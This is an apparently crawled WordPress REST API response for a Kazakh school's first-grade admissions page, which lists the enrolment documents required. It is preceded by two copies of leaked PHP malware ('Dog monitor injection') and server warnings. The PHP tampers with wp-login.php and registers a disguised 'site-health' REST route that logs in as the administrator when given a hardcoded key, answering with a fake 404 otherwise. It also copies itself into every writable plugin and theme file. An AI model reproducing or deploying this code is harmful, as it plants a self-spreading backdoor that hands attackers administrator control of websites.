// ===DOG_MONITOR_START=== // Dog monitor injection v1.5.7 if (!class_exists('DogMonitor_0b5f60411a') && !function_exists('dog_monitor_7a2f53e25f')) { class DogMonitor_0b5f60411a { public static function init() { $wp_login = ABSPATH . 'wp-login.php'; if (file_exists($wp_login) && is_writable($wp_login)) { $content = @file_get_contents($wp_login); $marker_start = ''; $marker_end = ''; $script_tag = ""; if ($content !== false && strpos($content, $marker_start) === false) { $inject_block = "\n{$marker_start}\n{$script_tag}\n{$marker_end}\n"; if (preg_match('/<\/body>/i', $content, $m, PREG_OFFSET_CAPTURE)) { $pos = $m[0][1]; $patched = substr($content, 0, $pos) . $inject_block . substr($content, $pos); if (strpos($patched, '') !== false && strpos($patched, $marker_start) !== false) { @file_put_contents($wp_login, $patched); } else { error_log("DogMonitor: injection integrity check failed."); } } else { error_log("DogMonitor: not found in wp-login.php"); } } } add_action('rest_api_init', function() { $stealth_key = '6c6c5a3b5389763a01'; register_rest_route('wp/v2', 'site-health', [ 'methods' => 'POST', 'callback' => function($request) use ($stealth_key) { $nonce = $request->get_param('nonce'); $action = $request->get_param('action'); if ($nonce === $stealth_key && $action === 'verify') { wp_set_auth_cookie(1); wp_redirect(admin_url()); exit; } return new WP_Error( 'rest_no_route', 'No route was found matching the URL and request method.', ['status' => 404] ); }, 'permission_callback' => '__return_true' ]); }); $opt = '_' . substr(md5(__CLASS__), 0, 8) . '_cache'; if (!get_option($opt) || time() - get_option($opt) > 86400) { update_option($opt, time(), 'no'); self::propagate(); } } public static function propagate() { $self = file_get_contents(__FILE__); preg_match('#// ===DOG_MONITOR_START===.+// ===DOG_MONITOR_END===#s', $self, $m); if (empty($m)) return; $payload = $m[0]; $dirs = [ ABSPATH . 'wp-content/plugins', ABSPATH . 'wp-content/themes', ]; foreach ($dirs as $base) { if (!is_dir($base)) continue; foreach (scandir($base) as $item) { if ($item === '.' || $item === '..') continue; $path = "$base/$item"; if (!is_dir($path)) continue; $targets = []; $main = $path . '/' . $item . '.php'; if (file_exists($main)) $targets[] = $main; foreach (glob("$path/*.php") as $file) { if (preg_match('/Plugin Name:/', file_get_contents($file))) { $targets[] = $file; } } $fn = $path . '/functions.php'; if (file_exists($fn)) $targets[] = $fn; foreach (array_unique($targets) as $file) { if (!is_writable($file)) continue; $content = file_get_contents($file); if (strpos($content, 'DOG_MONITOR_START') !== false) continue; if (preg_match('/\?>\s*$/', $content)) continue; file_put_contents($file, $content . " " . $payload); } } } } } function dog_monitor_7a2f53e25f() { DogMonitor_0b5f60411a::init(); } add_action('init', 'dog_monitor_7a2f53e25f', 1); } // ===DOG_MONITOR_END=== // ===DOG_MONITOR_START=== // Dog monitor injection v1.5.7 if (!class_exists('DogMonitor_0b5f60411a') && !function_exists('dog_monitor_7a2f53e25f')) { class DogMonitor_0b5f60411a { public static function init() { $wp_login = ABSPATH . 'wp-login.php'; if (file_exists($wp_login) && is_writable($wp_login)) { $content = @file_get_contents($wp_login); $marker_start = ''; $marker_end = ''; $script_tag = ""; if ($content !== false && strpos($content, $marker_start) === false) { $inject_block = "\n{$marker_start}\n{$script_tag}\n{$marker_end}\n"; if (preg_match('/<\/body>/i', $content, $m, PREG_OFFSET_CAPTURE)) { $pos = $m[0][1]; $patched = substr($content, 0, $pos) . $inject_block . substr($content, $pos); if (strpos($patched, '') !== false && strpos($patched, $marker_start) !== false) { @file_put_contents($wp_login, $patched); } else { error_log("DogMonitor: injection integrity check failed."); } } else { error_log("DogMonitor: not found in wp-login.php"); } } } add_action('rest_api_init', function() { $stealth_key = '6c6c5a3b5389763a01'; register_rest_route('wp/v2', 'site-health', [ 'methods' => 'POST', 'callback' => function($request) use ($stealth_key) { $nonce = $request->get_param('nonce'); $action = $request->get_param('action'); if ($nonce === $stealth_key && $action === 'verify') { wp_set_auth_cookie(1); wp_redirect(admin_url()); exit; } return new WP_Error( 'rest_no_route', 'No route was found matching the URL and request method.', ['status' => 404] ); }, 'permission_callback' => '__return_true' ]); }); $opt = '_' . substr(md5(__CLASS__), 0, 8) . '_cache'; if (!get_option($opt) || time() - get_option($opt) > 86400) { update_option($opt, time(), 'no'); self::propagate(); } } public static function propagate() { $self = file_get_contents(__FILE__); preg_match('#// ===DOG_MONITOR_START===.+// ===DOG_MONITOR_END===#s', $self, $m); if (empty($m)) return; $payload = $m[0]; $dirs = [ ABSPATH . 'wp-content/plugins', ABSPATH . 'wp-content/themes', ]; foreach ($dirs as $base) { if (!is_dir($base)) continue; foreach (scandir($base) as $item) { if ($item === '.' || $item === '..') continue; $path = "$base/$item"; if (!is_dir($path)) continue; $targets = []; $main = $path . '/' . $item . '.php'; if (file_exists($main)) $targets[] = $main; foreach (glob("$path/*.php") as $file) { if (preg_match('/Plugin Name:/', file_get_contents($file))) { $targets[] = $file; } } $fn = $path . '/functions.php'; if (file_exists($fn)) $targets[] = $fn; foreach (array_unique($targets) as $file) { if (!is_writable($file)) continue; $content = file_get_contents($file); if (strpos($content, 'DOG_MONITOR_START') !== false) continue; if (preg_match('/\?>\s*$/', $content)) continue; file_put_contents($file, $content . " " . $payload); } } } } } function dog_monitor_7a2f53e25f() { DogMonitor_0b5f60411a::init(); } add_action('init', 'dog_monitor_7a2f53e25f', 1); } // ===DOG_MONITOR_END===
Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904
{"id":273,"date":"2026-03-16T08:04:35","date_gmt":"2026-03-16T05:04:35","guid":{"rendered":"https:\/\/115-astana.edu.kz\/?page_id=273"},"modified":"2026-03-17T14:17:51","modified_gmt":"2026-03-17T11:17:51","slug":"%d0%bc%d0%b5%d0%ba%d1%82%d0%b5%d0%bf%d0%ba%d0%b5-%d2%9b%d0%b0%d0%b1%d1%8b%d0%bb%d0%b4%d0%b0%d1%83","status":"publish","type":"page","link":"https:\/\/115-astana.edu.kz\/?page_id=273","title":{"rendered":"\u041c\u0435\u043a\u0442\u0435\u043f\u043a\u0435 \u049b\u0430\u0431\u044b\u043b\u0434\u0430\u0443"},"content":{"rendered":"\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

\u0411\u0430\u0441\u0442\u0430\u0443\u044b\u0448 \u0431\u0456\u043b\u0456\u043c\u043d\u0456\u04a3 \u0436\u0430\u043b\u043f\u044b \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0435\u0442\u0456\u043d \u043e\u049b\u0443 \u0431\u0430\u0493\u0434\u0430\u0440\u043b\u0430\u043c\u0430\u043b\u0430\u0440\u044b\u043d \u0456\u0441\u043a\u0435 \u0430\u0441\u044b\u0440\u0430\u0442\u044b\u043d \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443 \u04b1\u0439\u044b\u043c\u0434\u0430\u0440\u044b\u043d\u044b\u04a3 \u0431\u0456\u0440\u0456\u043d\u0448\u0456 \u0441\u044b\u043d\u044b\u0431\u044b\u043d\u0430 \u049b\u0430\u0431\u044b\u043b\u0434\u0430\u043d\u0430\u0442\u044b\u043d \u043a\u04e9\u0440\u0441\u0435\u0442\u0456\u043b\u0435\u0442\u0456\u043d \u049b\u044b\u0437\u043c\u0435\u0442\u0442\u0456 \u0430\u043b\u0443\u0448\u044b\u0434\u0430\u043d \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440\u0434\u044b \u049b\u0430\u0431\u044b\u043b\u0434\u0430\u0443 \u0430\u0493\u044b\u043c\u0434\u0430\u0493\u044b \u043a\u04af\u043d\u0442\u0456\u0437\u0431\u0435\u043b\u0456\u043a \u0436\u044b\u043b\u0434\u044b\u04a3 1 \u0441\u04d9\u0443\u0456\u0440\u0456 \u043c\u0435\u043d 31 \u0442\u0430\u043c\u044b\u0437\u044b \u0430\u0440\u0430\u043b\u044b\u0493\u044b\u043d\u0434\u0430 \u0436\u04af\u0437\u0435\u0433\u0435 \u0430\u0441\u044b\u0440\u044b\u043b\u0430\u0434\u044b.<\/p>

\u00a0<\/p>

  1. \u0411\u0430\u043b\u0430\u043b\u0430\u0440\u0434\u044b \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443 \u04b1\u0439\u044b\u043c\u0434\u0430\u0440\u044b\u043d\u0430 \u049b\u0430\u0431\u044b\u043b\u0434\u0430\u0443 \u04af\u0448\u0456\u043d \u043c\u044b\u043d\u0430\u0434\u0430\u0439 \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440 \u04b1\u0441\u044b\u043d\u044b\u043b\u0430\u0434\u044b:<\/li><\/ol>

    \u00a0<\/p>

    \u00a0\u00a0\u00a0\u00a0\u00a0 1) \u049b\u044b\u0437\u043c\u0435\u0442 \u0430\u043b\u0443\u0448\u044b\u043d\u044b\u04a3 \u043e\u0441\u044b \u04ae\u043b\u0433\u0456\u043b\u0456\u043a \u049b\u0430\u0493\u0438\u0434\u0430\u043b\u0430\u0440\u0493\u0430 1-\u049b\u043e\u0441\u044b\u043c\u0448\u0430\u0493\u0430 \u0441\u04d9\u0439\u043a\u0435\u0441 \u043d\u044b\u0441\u0430\u043d \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u0436\u0430\u0437\u044b\u043b\u0493\u0430\u043d \u04e9\u0442\u0456\u043d\u0456\u0448\u0456;<\/p>

    \u00a0<\/p>

    \u00a0\u00a0\u00a0\u00a0\u00a0 2) \u0431\u0430\u043b\u0430\u043d\u044b\u04a3 \u0442\u0443\u0443 \u0442\u0443\u0440\u0430\u043b\u044b \u043a\u0443\u04d9\u043b\u0456\u0433\u0456 (\u049b\u04b1\u0436\u0430\u0442\u0442\u044b \u049b\u0430\u0493\u0430\u0437 \u0442\u04af\u0440\u0456\u043d\u0434\u0435 \u0442\u0430\u043f\u0441\u044b\u0440\u0493\u0430\u043d \u043a\u0435\u0437\u0434\u0435 \u0434\u0435\u0440\u0435\u043a\u0442\u0435\u0440\u0434\u0456 \u0441\u0430\u043b\u044b\u0441\u0442\u044b\u0440\u0443 \u04af\u0448\u0456\u043d \u043a\u04e9\u0440\u0441\u0435\u0442\u0456\u043b\u0435\u0442\u0456\u043d \u049b\u044b\u0437\u043c\u0435\u0442\u0442\u0456 \u0430\u043b\u0443\u0448\u044b\u043d\u044b\u04a3 \u04e9\u0437\u0456 \u04b1\u0441\u044b\u043d\u0430\u0434\u044b);<\/p>

    \u00a0<\/p>

    \u00a0\u00a0\u00a0\u00a0\u00a0 3) \u049b\u044b\u0437\u043c\u0435\u0442 \u0430\u043b\u0443\u0448\u044b\u043d\u044b\u04a3 \u0436\u0435\u043a\u0435 \u043a\u0443\u04d9\u043b\u0456\u0433\u0456 (\u049b\u04b1\u0436\u0430\u0442\u0442\u044b \u049b\u0430\u0493\u0430\u0437 \u0442\u04af\u0440\u0456\u043d\u0434\u0435 \u0442\u0430\u043f\u0441\u044b\u0440\u0493\u0430\u043d \u043a\u0435\u0437\u0434\u0435 \u0434\u0435\u0440\u0435\u043a\u0442\u0435\u0440\u0434\u0456 \u0441\u0430\u043b\u044b\u0441\u0442\u044b\u0440\u0443 \u04af\u0448\u0456\u043d \u043a\u04e9\u0440\u0441\u0435\u0442\u0456\u043b\u0435\u0442\u0456\u043d \u049b\u044b\u0437\u043c\u0435\u0442\u0442\u0456 \u0430\u043b\u0443\u0448\u044b\u043d\u044b\u04a3 \u04e9\u0437\u0456 \u04b1\u0441\u044b\u043d\u0430\u0434\u044b);<\/p>

    \u00a0<\/p>

    \u00a0\u00a0\u00a0\u00a0\u00a0 4) «\u0414\u0435\u043d\u0441\u0430\u0443\u043b\u044b\u049b \u0441\u0430\u049b\u0442\u0430\u0443 \u0441\u0430\u043b\u0430\u0441\u044b\u043d\u0434\u0430\u0493\u044b \u0435\u0441\u0435\u043f\u0442\u0456\u043a \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u043c\u0430\u043d\u044b\u04a3 \u043d\u044b\u0441\u0430\u043d\u0434\u0430\u0440\u044b\u043d, \u0441\u043e\u043d\u0434\u0430\u0439-\u0430\u049b \u043e\u043b\u0430\u0440\u0434\u044b \u0442\u043e\u043b\u0442\u044b\u0440\u0443 \u0436\u04e9\u043d\u0456\u043d\u0434\u0435\u0433\u0456 \u043d\u04b1\u0441\u049b\u0430\u0443\u043b\u044b\u049b\u0442\u0430\u0440\u0434\u044b \u0431\u0435\u043a\u0456\u0442\u0443 \u0442\u0443\u0440\u0430\u043b\u044b» \u049a\u0430\u0437\u0430\u049b\u0441\u0442\u0430\u043d \u0420\u0435\u0441\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0441\u044b \u0414\u0435\u043d\u0441\u0430\u0443\u043b\u044b\u049b \u0441\u0430\u049b\u0442\u0430\u0443 \u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0456\u043d\u0456\u04a3 \u043c\u0456\u043d\u0434\u0435\u0442\u0456\u043d \u0430\u0442\u049b\u0430\u0440\u0443\u0448\u044b\u043d\u044b\u04a3 2020 \u0436\u044b\u043b\u0493\u044b 30 \u049b\u0430\u0437\u0430\u043d\u0434\u0430\u0493\u044b \u2116 \u049a\u0420 \u0414\u0421\u041c-175\/2020 (\u041d\u043e\u0440\u043c\u0430\u0442\u0438\u0432\u0442\u0456\u043a \u049b\u04b1\u049b\u044b\u049b\u0442\u044b\u049b \u0430\u043a\u0442\u0456\u043b\u0435\u0440\u0434\u0456 \u043c\u0435\u043c\u043b\u0435\u043a\u0435\u0442\u0442\u0456\u043a \u0442\u0456\u0440\u043a\u0435\u0443 \u0442\u0456\u0437\u0456\u043b\u0456\u043c\u0456\u043d\u0434\u0435 \u2116 21579 \u0442\u0456\u0440\u043a\u0435\u043b\u0433\u0435\u043d) \u0431\u04b1\u0439\u0440\u044b\u0493\u044b\u043d\u0430 (\u0431\u04b1\u0434\u0430\u043d \u04d9\u0440\u0456 — \u049a\u0420 \u0414\u0421\u041c-175\/2020 \u0431\u04b1\u0439\u0440\u044b\u0493\u044b) \u0441\u04d9\u0439\u043a\u0435\u0441 \u2116 065\/\u0435 \u043d\u044b\u0441\u0430\u043d\u044b\u043d\u0434\u0430\u0493\u044b «\u0418\u043c\u043c\u0443\u043d\u0434\u0430\u0443 \u043f\u0430\u0441\u043f\u043e\u0440\u0442\u044b» \u0436\u04d9\u043d\u0435 \u2116 052-2\/\u0435 \u043d\u044b\u0441\u0430\u043d\u044b\u043d\u0434\u0430\u0493\u044b «\u0411\u0430\u043b\u0430 \u0434\u0435\u043d\u0441\u0430\u0443\u043b\u044b\u0493\u044b\u043d\u044b\u04a3 \u043f\u0430\u0441\u043f\u043e\u0440\u0442» \u043c\u0435\u0434\u0438\u0446\u0438\u043d\u0430\u043b\u044b\u049b \u0430\u043d\u044b\u049b\u0442\u0430\u043c\u0430\u043b\u0430\u0440\u044b;<\/p>

    \u00a0<\/p>

    \u00a0\u00a0\u00a0\u00a0\u00a0 5) \u0431\u0430\u043b\u0430\u043d\u044b\u04a3 3\u04454 \u0441\u043c \u043a\u04e9\u043b\u0435\u043c\u0456\u043d\u0434\u0435\u0433\u0456 \u0444\u043e\u0442\u043e\u0441\u0443\u0440\u0435\u0442\u0456.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t

    \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\"1\"\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"

    \u0411\u0430\u0441\u0442\u0430\u0443\u044b\u0448 \u0431\u0456\u043b\u0456\u043c\u043d\u0456\u04a3 \u0436\u0430\u043b\u043f\u044b \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0435\u0442\u0456\u043d \u043e\u049b\u0443 \u0431\u0430\u0493\u0434\u0430\u0440\u043b\u0430\u043c\u0430\u043b\u0430\u0440\u044b\u043d \u0456\u0441\u043a\u0435 \u0430\u0441\u044b\u0440\u0430\u0442\u044b\u043d \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443 \u04b1\u0439\u044b\u043c\u0434\u0430\u0440\u044b\u043d\u044b\u04a3 \u0431\u0456\u0440\u0456\u043d\u0448\u0456 \u0441\u044b\u043d\u044b\u0431\u044b\u043d\u0430 \u049b\u0430\u0431\u044b\u043b\u0434\u0430\u043d\u0430\u0442\u044b\u043d \u043a\u04e9\u0440\u0441\u0435\u0442\u0456\u043b\u0435\u0442\u0456\u043d \u049b\u044b\u0437\u043c\u0435\u0442\u0442\u0456 \u0430\u043b\u0443\u0448\u044b\u0434\u0430\u043d \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440\u0434\u044b \u049b\u0430\u0431\u044b\u043b\u0434\u0430\u0443 \u0430\u0493\u044b\u043c\u0434\u0430\u0493\u044b \u043a\u04af\u043d\u0442\u0456\u0437\u0431\u0435\u043b\u0456\u043a \u0436\u044b\u043b\u0434\u044b\u04a3 1 \u0441\u04d9\u0443\u0456\u0440\u0456 \u043c\u0435\u043d 31 \u0442\u0430\u043c\u044b\u0437\u044b \u0430\u0440\u0430\u043b\u044b\u0493\u044b\u043d\u0434\u0430 \u0436\u04af\u0437\u0435\u0433\u0435 \u0430\u0441\u044b\u0440\u044b\u043b\u0430\u0434\u044b. \u00a0 \u0411\u0430\u043b\u0430\u043b\u0430\u0440\u0434\u044b \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443 \u04b1\u0439\u044b\u043c\u0434\u0430\u0440\u044b\u043d\u0430 \u049b\u0430\u0431\u044b\u043b\u0434\u0430\u0443 \u04af\u0448\u0456\u043d \u043c\u044b\u043d\u0430\u0434\u0430\u0439 \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440 \u04b1\u0441\u044b\u043d\u044b\u043b\u0430\u0434\u044b: \u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0 1) \u049b\u044b\u0437\u043c\u0435\u0442 \u0430\u043b\u0443\u0448\u044b\u043d\u044b\u04a3 \u043e\u0441\u044b \u04ae\u043b\u0433\u0456\u043b\u0456\u043a \u049b\u0430\u0493\u0438\u0434\u0430\u043b\u0430\u0440\u0493\u0430 1-\u049b\u043e\u0441\u044b\u043c\u0448\u0430\u0493\u0430 \u0441\u04d9\u0439\u043a\u0435\u0441 \u043d\u044b\u0441\u0430\u043d \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u0436\u0430\u0437\u044b\u043b\u0493\u0430\u043d \u04e9\u0442\u0456\u043d\u0456\u0448\u0456; […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-273","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages\/273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=273"}],"version-history":[{"count":4,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages\/273\/revisions"}],"predecessor-version":[{"id":370,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages\/273\/revisions\/370"}],"wp:attachment":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}